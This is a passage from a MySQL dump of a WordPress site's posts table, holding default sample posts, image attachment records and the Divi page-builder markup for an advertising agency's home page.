  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=826 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (1,1,'2020-02-19 14:36:58','2020-02-19 14:36:58','[et_pb_section admin_label=\"section\"]\n			[et_pb_row admin_label=\"row\"]\n				[et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<!-- wp:paragraph -->\n<p>Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</p>\n<!-- /wp:paragraph -->[/et_pb_text][/et_pb_column]\n			[/et_pb_row]\n		[/et_pb_section]','Hello world!','','publish','open','open','','hello-world','','','2020-07-06 19:06:29','2020-07-06 19:06:29','',0,'https:/?p=1',0,'post','',0),(2,1,'2020-02-19 14:36:58','2020-02-19 14:36:58','<!-- wp:paragraph -->\n<p>This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin\' caught in the rain.)</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>...or something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>As a new WordPress user, you should go to <a href=\"https:/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!</p>\n<!-- /wp:paragraph -->','Sample Page','','publish','closed','open','','sample-page','','','2020-02-19 14:36:58','2020-02-19 14:36:58','',0,'https:/?page_id=2',0,'page','',0),(7,1,'2020-05-24 20:13:36','2020-05-24 20:13:36','','Divi','','publish','closed','closed','','divi','','','2020-09-24 18:51:23','2020-09-24 18:51:23','',0,'https://52.66.212.87/2020/05/24/divi/',0,'custom_css','',0),(8,1,'2020-05-24 20:13:36','2020-05-24 20:13:36','','Divi','','inherit','closed','closed','','7-revision-v1','','','2020-05-24 20:13:36','2020-05-24 20:13:36','',7,'https://52.66.212.87/2020/05/24/7-revision-v1/',0,'revision','',0),(11,1,'2020-05-24 20:27:33','2020-05-24 20:27:33','https://52.66.212.87/wp-content/uploads/2020/05/cropped-Artboard.jpg','cropped-Artboard.jpg','','inherit','open','closed','','cropped-artboard-jpg','','','2020-05-24 20:27:33','2020-05-24 20:27:33','',0,'https://52.66.212.87/wp-content/uploads/2020/05/cropped-Artboard.jpg',0,'attachment','image/jpeg',0),(14,1,'2020-05-24 20:32:16','2020-05-24 20:32:16','https://52.66.212.87/wp-content/uploads/2020/05/cropped-thumbnail.png','cropped-thumbnail.png','','inherit','open','closed','','cropped-thumbnail-png','','','2020-05-24 20:32:16','2020-05-24 20:32:16','',0,'https://52.66.212.87/wp-content/uploads/2020/05/cropped-thumbnail.png',0,'attachment','image/png',0),(18,1,'2020-05-24 20:42:16','2020-05-24 20:42:16','','geometric-bg-overlay-01','','inherit','open','closed','','geometric-bg-overlay-01','','','2020-05-24 20:42:16','2020-05-24 20:42:16','',0,'https://52.66.212.87/wp-content/uploads/2020/05/geometric-bg-overlay-01.jpg',0,'attachment','image/jpeg',0),(20,1,'2020-05-24 20:42:19','2020-05-24 20:42:19','','quote-bg','','inherit','open','closed','','quote-bg','','','2020-05-24 20:42:19','2020-05-24 20:42:19','',0,'https://52.66.212.87/wp-content/uploads/2020/05/quote-bg.png',0,'attachment','image/png',0),(23,1,'2020-05-24 20:42:20','2020-05-24 20:42:20','','geometric-bg-overlay-02','','inherit','open','closed','','geometric-bg-overlay-02','','','2020-05-24 20:42:20','2020-05-24 20:42:20','',0,'https://52.66.212.87/wp-content/uploads/2020/05/geometric-bg-overlay-02.jpg',0,'attachment','image/jpeg',0),(24,1,'2020-05-24 20:42:24','2020-05-24 20:42:24','','sass-ui-mocks-o5','','inherit','open','closed','','sass-ui-mocks-o5','','','2020-05-24 20:42:24','2020-05-24 20:42:24','',0,'https://52.66.212.87/wp-content/uploads/2020/05/sass-ui-mocks-o5.jpg',0,'attachment','image/jpeg',0),(31,1,'2020-05-24 20:50:48','2020-05-24 20:50:48','','img-5','','inherit','open','closed','','img-5','','','2020-05-24 20:50:48','2020-05-24 20:50:48','',0,'https://52.66.212.87/wp-content/uploads/2020/05/img-5.png',0,'attachment','image/png',0),(32,1,'2020-05-24 20:50:48','2020-05-24 20:50:48','','img-4-1','','inherit','open','closed','','img-4-1','','','2020-05-24 20:50:48','2020-05-24 20:50:48','',0,'https://52.66.212.87/wp-content/uploads/2020/05/img-4-1.png',0,'attachment','image/png',0),(33,1,'2020-05-24 20:50:48','2020-05-24 20:50:48','','img-6-1','','inherit','open','closed','','img-6-1','','','2020-05-24 20:50:48','2020-05-24 20:50:48','',0,'https://52.66.212.87/wp-content/uploads/2020/05/img-6-1.png',0,'attachment','image/png',0),(34,1,'2020-05-24 20:50:49','2020-05-24 20:50:49','','Group-12','','inherit','open','closed','','group-12','','','2020-05-24 20:50:49','2020-05-24 20:50:49','',0,'https://52.66.212.87/wp-content/uploads/2020/05/Group-12.png',0,'attachment','image/png',0),(35,1,'2020-05-24 20:50:49','2020-05-24 20:50:49','','Group-1','','inherit','open','closed','','group-1','','','2020-05-24 20:50:49','2020-05-24 20:50:49','',0,'https://52.66.212.87/wp-content/uploads/2020/05/Group-1.png',0,'attachment','image/png',0),(36,1,'2020-05-24 20:50:49','2020-05-24 20:50:49','','Group-1-corpy','','inherit','open','closed','','group-1-corpy','','','2020-05-24 20:50:49','2020-05-24 20:50:49','',0,'https://52.66.212.87/wp-content/uploads/2020/05/Group-1-corpy.png',0,'attachment','image/png',0),(37,1,'2020-05-24 20:50:49','2020-05-24 20:50:49','','Group-1-copy-2','','inherit','open','closed','','group-1-copy-2','','','2020-05-24 20:50:49','2020-05-24 20:50:49','',0,'https://52.66.212.87/wp-content/uploads/2020/05/Group-1-copy-2.png',0,'attachment','image/png',0),(95,1,'2020-06-26 18:58:02','2020-06-26 18:58:02','','agency-09','','inherit','open','closed','','agency-09','','','2020-06-26 18:58:02','2020-06-26 18:58:02','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-09.jpg',0,'attachment','image/jpeg',0),(96,1,'2020-06-26 18:58:04','2020-06-26 18:58:04','','agency-08','','inherit','open','closed','','agency-08','','','2020-06-26 18:58:04','2020-06-26 18:58:04','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-08.jpg',0,'attachment','image/jpeg',0),(97,1,'2020-06-26 18:58:04','2020-06-26 18:58:04','','agency-07','','inherit','open','closed','','agency-07','','','2020-06-26 18:58:04','2020-06-26 18:58:04','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-07.jpg',0,'attachment','image/jpeg',0),(98,1,'2020-06-26 18:58:08','2020-06-26 18:58:08','','agency-10','','inherit','open','closed','','agency-10','','','2020-06-26 18:58:08','2020-06-26 18:58:08','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-10.jpg',0,'attachment','image/jpeg',0),(99,1,'2020-06-26 18:58:10','2020-06-26 18:58:10','','agency-03','','inherit','open','closed','','agency-03','','','2020-06-26 18:58:10','2020-06-26 18:58:10','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-03.jpg',0,'attachment','image/jpeg',0),(100,1,'2020-06-26 18:58:12','2020-06-26 18:58:12','','agency-04','','inherit','open','closed','','agency-04','','','2020-06-26 18:58:12','2020-06-26 18:58:12','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-04.jpg',0,'attachment','image/jpeg',0),(101,1,'2020-06-26 18:58:14','2020-06-26 18:58:14','','agency-19','','inherit','open','closed','','agency-19','','','2020-06-26 18:58:14','2020-06-26 18:58:14','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-19.jpg',0,'attachment','image/jpeg',0),(102,1,'2020-06-26 18:58:16','2020-06-26 18:58:16','','agency-18','','inherit','open','closed','','agency-18','','','2020-06-26 18:58:16','2020-06-26 18:58:16','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-18.jpg',0,'attachment','image/jpeg',0),(103,1,'2020-06-26 18:58:17','2020-06-26 18:58:17','','agency-05','','inherit','open','closed','','agency-05','','','2020-06-26 18:58:17','2020-06-26 18:58:17','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-05.png',0,'attachment','image/png',0),(104,1,'2020-06-26 18:58:20','2020-06-26 18:58:20','','agency-13','','inherit','open','closed','','agency-13','','','2020-06-26 18:58:20','2020-06-26 18:58:20','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-13.png',0,'attachment','image/png',0),(105,1,'2020-06-26 18:58:23','2020-06-26 18:58:23','','agency-06','','inherit','open','closed','','agency-06','','','2020-06-26 18:58:23','2020-06-26 18:58:23','',0,'https://52.66.212.87/wp-content/uploads/2020/06/agency-06.png',0,'attachment','image/png',0),(121,1,'2020-07-02 20:10:29','2020-07-02 20:10:29','','circle-background-pattern','','inherit','open','closed','','circle-background-pattern','','','2020-07-02 20:10:29','2020-07-02 20:10:29','',0,'https://52.66.212.87/wp-content/uploads/2020/07/circle-background-pattern.png',0,'attachment','image/png',0),(122,1,'2020-07-02 20:10:33','2020-07-02 20:10:33','','business-13','','inherit','open','closed','','business-13','','','2020-07-02 20:10:33','2020-07-02 20:10:33','',0,'https://52.66.212.87/wp-content/uploads/2020/07/business-13.jpg',0,'attachment','image/jpeg',0),(123,1,'2020-07-02 20:10:37','2020-07-02 20:10:37','','business_01','','inherit','open','closed','','business_01','','','2020-07-02 20:10:37','2020-07-02 20:10:37','',0,'https://52.66.212.87/wp-content/uploads/2020/07/business_01.jpg',0,'attachment','image/jpeg',0),(124,1,'2020-07-02 20:10:40','2020-07-02 20:10:40','','home-office-01','','inherit','open','closed','','home-office-01','','','2020-07-02 20:10:40','2020-07-02 20:10:40','',0,'https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg',0,'attachment','image/jpeg',0),(125,1,'2020-07-02 20:10:41','2020-07-02 20:10:41','','travel-portrait-01','','inherit','open','closed','','travel-portrait-01','','','2020-07-02 20:10:41','2020-07-02 20:10:41','',0,'https://52.66.212.87/wp-content/uploads/2020/07/travel-portrait-01.jpg',0,'attachment','image/jpeg',0),(126,1,'2020-07-02 20:10:43','2020-07-02 20:10:43','','travel-portrait-06','','inherit','open','closed','','travel-portrait-06','','','2020-07-02 20:10:43','2020-07-02 20:10:43','',0,'https://52.66.212.87/wp-content/uploads/2020/07/travel-portrait-06.jpg',0,'attachment','image/jpeg',0),(127,1,'2020-07-02 20:10:44','2020-07-02 20:10:44','','travel-portrait-04','','inherit','open','closed','','travel-portrait-04','','','2020-07-02 20:10:44','2020-07-02 20:10:44','',0,'https://52.66.212.87/wp-content/uploads/2020/07/travel-portrait-04.jpg',0,'attachment','image/jpeg',0),(128,1,'2020-07-02 20:10:45','2020-07-02 20:10:45','','home-office-06','','inherit','open','closed','','home-office-06','','','2020-07-02 20:10:45','2020-07-02 20:10:45','',0,'https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg',0,'attachment','image/jpeg',0),(129,1,'2020-07-02 20:10:46','2020-07-02 20:10:46','','home-office-05','','inherit','open','closed','','home-office-05','','','2020-07-02 20:10:46','2020-07-02 20:10:46','',0,'https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg',0,'attachment','image/jpeg',0),(130,1,'2020-07-02 20:10:47','2020-07-02 20:10:47','','home-office-02','','inherit','open','closed','','home-office-02','','','2020-07-02 20:10:47','2020-07-02 20:10:47','',0,'https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg',0,'attachment','image/jpeg',0),(134,1,'2020-07-02 20:15:33','2020-07-02 20:15:33','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.6\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/03/banner-1.jpeg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising Agency</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Packed with creative skills; we have been serving as one of the best agencies in the region.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image 